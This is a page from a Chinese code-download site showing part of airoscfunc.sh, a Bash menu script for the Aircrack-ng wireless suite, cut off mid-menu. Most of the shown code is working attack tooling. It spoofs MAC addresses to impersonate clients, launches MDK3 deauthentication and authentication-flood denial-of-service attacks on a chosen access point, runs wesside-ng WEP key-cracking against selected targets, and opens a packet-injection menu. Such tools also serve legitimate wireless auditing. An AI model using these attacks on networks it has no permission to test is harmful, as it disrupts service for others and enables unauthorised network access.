⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 airoscfunc.sh

📁 Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough dat
💻 SH
📖 第 1 页 / 共 4 页
字号:
			if [ "$answer" != "n" ]			then				TYPE=`$AIRMON start $WIFICARD | grep monitor | awk '{print $2 $3}'`				DRIVER=`$AIRMON start $WIFICARD | grep monitor | awk '{print $4}'`			else				TYPE=`$AIRMON stop $WIFICARD | grep monitor | awk '{print $2 $3}'`				DRIVER=`$AIRMON stop $WIFICARD | grep monitor | awk '{print $4}'`			fi		$CLEAR		$IWIFI=$WIFI		echo  `gettext 'Interface used is :'` $WIFICARD		echo  `gettext 'Interface type is :'` "$TYPE ($DRIVER)"		testmac	}	# 3.	function cleanup {		killall -9 aireplay-ng airodump-ng > /dev/null &		$AIRMON stop $WIFICARD		ifconfig $WIFICARD down		$CLEAR		sleep 2		$CARDCTL eject		sleep 2		$CARDCTL insert		ifconfig $WIFICARD up		$AIRMON start $WIFICARD $Host_CHAN		$iwconfig $WIFICARD	}	# 4.	function wichchangemac {		while true; do			echo -n -e "`gettext '	||	||	\/	_____________________________________	##      Select next step           ##	##                                 ##	##   1) Change MAC to FAKEMAC      ##	##   2) Change MAC to CLIENTMAC    ##	##   3) Manual Mac input           ##	##_________________________________##	Option: '`"			read yn						case $yn in				1 ) fakemacchanger ;$CLEAR; break ;;				2 ) macchanger ;$CLEAR; break ;;				3 ) macinput ; $CLEAR; break ;;				* ) echo -e "`gettext \"Unknown response. Try again\"`" ;;			esac		done 	}			# And those are from wichchangemac		function fakemacchanger {			if [ "$TYPE" = "RalinkUSB" ]			then				fakechangemacrausb			elif [ "$TYPE" = "Ralinkb/g" ]			then				fakechangemacwlan			elif [ "$DRIVER" = "PCI" ]			then				fakechangemacwlan			elif [ "$TYPE" = "Atherosmadwifi-ng" ]			then				fakechangemacath			else			echo -e "`gettext \"Unknow way to change mac\"`"			fi					}					# And those from fakemacchanger			function fakechangemacrausb {				ifconfig $WIFICARD down				$MACCHANGER -m  $FAKE_MAC $WIFICARD				ifconfig $WIFICARD up			}				function fakechangemacwlan {				ifconfig $WIFICARD down				$MACCHANGER -m  $FAKE_MAC $WIFICARD				ifconfig $WIFICARD up			}						function fakechangemacath {				ifconfig $WIFICARD down				$MACCHANGER -m  $FAKE_MAC $WIFICARD				ifconfig $WIFICARD up			}					function macchanger {			if [ "$TYPE" = "RalinkUSB" ]			then				changemacrausb			elif [ "$TYPE" = "Ralinkb/g" ]			then 				changemacwlan			elif [ "$DRIVER" = "PCI" ]			then				changemacwlan			elif [ "$TYPE" = "Atherosmadwifi-ng" ]			then				changemacath			else				echo -e "`gettext \"Unknow way to change mac\"`"			echo "$DRIVER $TYPE"			fi					}			# Those are part of macchanger			function changemacrausb {				ifconfig $WIFICARD down				sleep 2				$MACCHANGER -m  $Client_MAC $WIFICARD				ifconfig $WIFICARD up			}						function changemacwlan {				ifconfig $WIFICARD down				sleep 2				$MACCHANGER -m  $Client_MAC $WIFICARD				ifconfig $WIFICARD up			}						function changemacath {				ifconfig $WIFICARD down				sleep 2				$MACCHANGER -m  $Client_MAC $WIFICARD				ifconfig $WIFICARD up			}					function macinput {			echo -n -e "`gettext \"OK, now type in new MAC: \"`"			read MANUAL_MAC			echo `gettext 'You typed:'` $MANUAL_MAC			set -- ${MANUAL_MAC}			manualmacchanger		}			function manualmacchanger {				if [ "$TYPE" = "RalinkUSB" ]				then					manualchangemacrausb				elif [ "$TYPE" = "Ralinkb/g" ]				then					manualchangemacwlan				elif [ "$DRIVER" = "PCI" ]				then					manualchangemacwlan				elif [ "$TYPE" = "Atherosmadwifi-ng" ]				then					manualchangemacath				else					echo "Unknow way to change mac"			echo "$DRIVER $TYPE"				fi						}			# I suppose all this code if for precaution. I mean, if sometime the method differes between the different kind of cards, or if we've got to add a new card with a differente method.				function manualchangemacrausb {					ifconfig $WIFICARD down					$MACCHANGER -m  $Client_MAC $WIFICARD					ifconfig $WIFICARD up				}				function manualchangemacwlan {					ifconfig $WIFICARD down					$MACCHANGER -m  $Client_MAC $WIFICARD					ifconfig $WIFICARD up				}				function manualchangemacath {					ifconfig $WIFICARD down					$MACCHANGER -m  $Client_MAC $WIFICARD					ifconfig $WIFICARD up				}	# 5. 		function choosemdk {			if [ -x $MDK3 ] 			then			while true; do				$CLEAR				echo -n "`gettext '			_____________________________________			##   Choose MDK3 Options           ##			##                                 ##			##   1) Deauthentication           ##			##   2) Prob selected AP           ##			##   3) Select another target      ##			##   4) Authentication DoS         ##			##   5) Return to main menu        ##			##_________________________________##			Option: '`"				read yn								case $yn in					1 ) mdkpain ; break ;;					2 ) mdktargetedpain ; break ;;					3 ) mdknewtarget ; break ;;					4 ) mdkauth ; break ;;					5 ) break ;;					* ) echo "unknown response. Try again" ;;				esac			done 			else				$CLEAR				echo "Sorry, this function is not installed on your system"			fi		}				function mdkpain {				$TERMINAL $HOLD $TOPLEFTBIG $TITLEFLAG "`gettext 'MDK attack'`" $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" $EXECFLAG $MDK3 $WIFI d & choosemdk			}						function mdktargetedpain {				$TERMINAL $HOLD $TOPLEFTBIG $TITLEFLAG "`gettext 'MDK attack on AP:'` $Host_SSID" $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" $EXECFLAG $MDK3 $WIFI p -b a -c $Host_CHAN -t $Host_MAC & choosemdk			}						function mdknewtarget {				ap_array=`cat $DUMP_PATH/dump-01.csv | grep -a -n Station | awk -F : '{print $1}'`				head -n $ap_array $DUMP_PATH/dump-01.csv &> $DUMP_PATH/dump-02.csv				$CLEAR				echo "        Detected Access point list"				echo ""				echo " #      MAC                      CHAN    SECU    POWER   #CHAR   SSID"				echo ""				i=0				while IFS=, read MAC FTS LTS CHANNEL SPEED PRIVACY CYPHER AUTH POWER BEACON IV LANIP IDLENGTH ESSID KEY;do 					longueur=${#MAC}					if [ $longueur -ge 17 ]; then					i=$(($i+1))					echo -e " "$i")\t"$MAC"\t"$CHANNEL"\t"$PRIVACY"\t"$POWER"\t"$IDLENGTH"\t"$ESSID					aidlenght=$IDLENGTH					assid[$i]=$ESSID					achannel[$i]=$CHANNEL					amac[$i]=$MAC					aprivacy[$i]=$PRIVACY					aspeed[$i]=$SPEED					fi				done < $DUMP_PATH/dump-02.csv				echo ""				echo "        Select target               "				read choice					idlenght=${aidlenght[$choice]}					ssid=${assid[$choice]}					channel=${achannel[$choice]}					mac=${amac[$choice]}					privacy=${aprivacy[$choice]}					speed=${aspeed[$choice]}					Host_IDL=$idlength					Host_SPEED=$speed					Host_ENC=$privacy					Host_MAC=$mac					Host_CHAN=$channel					acouper=${#ssid}					fin=$(($acouper-idlength))					Host_SSID=${ssid:1:fin}					choosemdk			}			function mdkauth {				$TERMINAL $HOLD $TOPLEFTBIG $TITLEFLAG "`gettext 'Wesside-ng attack on AP:'` $Host_SSID" $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" $EXECFLAG $MDK3 $WIFI a & choosemdk			}		# 6.		function choosewesside {			while true; do				$CLEAR				echo -e -n "`gettext '	_____________________________________	##   Choose Wesside-ng Options     ##	##                                 ##	##   1) No arguments               ##	##   2) Selected target            ##	##   3) Sel. target max rertransmit #	##   4) Sel. target poor connection #	##   5) Select another target      ##	##   6) Return to main menu        ##	##_________________________________##		Option: '`"							read yn				case $yn in					1 ) wesside ; break ;;					2 ) wessidetarget ; break ;;					3 ) wessidetargetmaxer ; break ;;					4 ) wessidetargetpoor ; break ;;					5 ) wessidenewtarget ; break ;;					6 ) break ;;					* ) echo -e "`gettext \"Unknown response. Try again\"`" ;;				esac			done 		}			function wesside {				rm -rf prga.log				rm -rf wep.cap				rm -rf key.log				$TERMINAL $HOLD $TOPLEFTBIG $TITLEFLAG "`gettext 'Wesside-ng attack'`" $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" $EXECFLAG wesside-ng -i $WIFI & choosewesside			}			function wessidetarget {				rm -rf prga.log				rm -rf wep.cap				rm -rf key.log				$TERMINAL $HOLD $TOPLEFTBIG $TITLEFLAG "`gettext 'Wesside-ng attack'` ($Host_SSID)" $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" $EXECFLAG wesside-ng -v $Host_MAC -i $WIFI & choosewesside			}			function wessidetargetmaxer {				rm -rf prga.log				rm -rf wep.cap				rm -rf key.log				$TERMINAL $HOLD $TOPLEFTBIG $TITLEFLAG "`gettext 'Wesside-ng attack'` ($Host_SSID)" $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" $EXECFLAG wesside-ng -v $Host_MAC -k 1 -i $WIFI & choosewesside			}			function wessidetargetpoor {				rm -rf prga.log				rm -rf wep.cap				rm -rf key.log				$TERMINAL $HOLD $TOPLEFTBIG $TITLEFLAG "`gettext 'Wesside-ng attack'` ($Host_SSID)" $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" $EXECFLAG wesside-ng -v $Host_MAC -k 3 -i $WIFI & choosewesside			}			function wessidenewtarget {				rm -rf prga.log				rm -rf wep.cap				rm -rf key.log				ap_array=`cat $DUMP_PATH/dump-01.csv | grep -a -n Station | awk -F : '{print $1}'`				head -n $ap_array $DUMP_PATH/dump-01.csv &> $DUMP_PATH/dump-02.csv				$CLEAR				echo -e "`gettext\"        Detected Access point list\"`"				echo ""				echo " #      MAC                      CHAN    SECU    POWER   #CHAR   SSID"				echo ""				i=0				while IFS=, read MAC FTS LTS CHANNEL SPEED PRIVACY CYPHER AUTH POWER BEACON IV LANIP IDLENGTH ESSID KEY;do 				longueur=${#MAC}				if [ $longueur -ge 17 ]; then					i=$(($i+1))					echo -e " "$i")\t"$MAC"\t"$CHANNEL"\t"$PRIVACY"\t"$POWER"\t"$IDLENGTH"\t"$ESSID					aidlenght=$IDLENGTH					assid[$i]=$ESSID					achannel[$i]=$CHANNEL					amac[$i]=$MAC					aprivacy[$i]=$PRIVACY					aspeed[$i]=$SPEED				fi								done < $DUMP_PATH/dump-02.csv					echo ""					echo -e "`gettext \"       Select target               \"`"					read choice						idlenght=${aidlenght[$choice]}						ssid=${assid[$choice]}						channel=${achannel[$choice]}						mac=${amac[$choice]}						privacy=${aprivacy[$choice]}						speed=${aspeed[$choice]}						Host_IDL=$idlength						Host_SPEED=$speed						Host_ENC=$privacy						Host_MAC=$mac						Host_CHAN=$channel						acouper=${#ssid}						fin=$(($acouper-idlength))						Host_SSID=${ssid:1:fin}						$TERMINAL $HOLD $TOPLEFTBIG $TITLEFLAG "`gettext 'Wesside-ng attack'` ($Host_SSID9" $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" $EXECFLAG wesside-ng -v $Host_MAC -i $WIFI & choosewesside			}	# 7.	# starts monitor mode on selected interface			function monitor_interface {		if [ "$TYPE" = "RalinkUSB" ]		then			IS_MONITOR=`$AIRMON start $WIFICARD |grep monitor`			$iwconfig $WIFICARD mode monitor			echo $IS_MONITOR			elif [ "$TYPE" = "Ralinkb/g" ]		then			IS_MONITOR=`$AIRMON start $WIFICARD |grep monitor`			echo $IS_MONITOR			iwpriv $WIFICARD rfmontx 1 2>/dev/null			iwpriv $WIFICARD forceprism 1 2>/dev/null		elif [ "$DRIVER" = "PCI" ]		then			IS_MONITOR=`$AIRMON start $WIFICARD |grep monitor`			echo $IS_MONITOR			iwpriv $WIFICARD rfmontx 1 2>/dev/null			iwpriv $WIFICARD forceprism 1 2>/dev/null			elif [ "$TYPE" = "Atherosmadwifi-ng" ]		then			IS_MONITOR=`$AIRMON start wifi0 |grep monitor`			$AIRMON stop ath0			$AIRMON stop ath1			$AIRMON stop ath2			echo $IS_MONITOR		else			IS_MONITOR=`$AIRMON start $WIFICARD |grep monitor`			echo "Running standard monitor mode command"			echo $IS_MONITOR		fi 	}	# 8.	function airmoncheck {		if [ "$TYPE" = "RalinkUSB" ]		then			$AIRMON check $WIFICARD			echo ""		elif [ "$TYPE" = "Ralinkb/g" ]		then			$AIRMON check $WIFICARD			echo ""		elif [ "$DRIVER" = "PCI" ]		then			$AIRMON check $WIFICARD			echo ""		elif [ "$TYPE" = "Atherosmadwifi-ng" ]		then			$AIRMON check wifi0			echo ""		else			$AIRMON check $WIFICARD			echo ""		fi 	}changedumppath(){	OLD_DUMP_PATH=$DUMP_PATH	read -p "`gettext 'Enter new path: '`" DUMP_PATH	read -p "`gettext 'Copy data into new folder? (y/N): '`" ACP && [[ "$ACP" = "y" ]]; cp -r $OLD_DUMP_PATH/* $DUMP_PATH/	read -p "`gettext 'Erase old folder? (y/N): '`" EPF && [[ "$EPF" = "y" ]]; rm -r $OLD_DUMP_PATH	mkdir -p $DUMP_PATH # If exists, it won't be created again, so we don't lose anything fot this :-)	clear}############################################################################################################################################################################################# This is for iNJECTION  (8)  option:       ##################################################################################################################################################################################function injectmenu {	$CLEAR	while true; do		echo -n -e "`gettext '_____________________________________##  If previous step went fine     ####  Select next, otherwise hit5    ####                                 ####   1) Frag injection             ####   2) Frag with client injection ####   3) Chochop injection          ####   4) Chopchop with client inj.  ####   5) Return to main menu        ####                                 ##

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -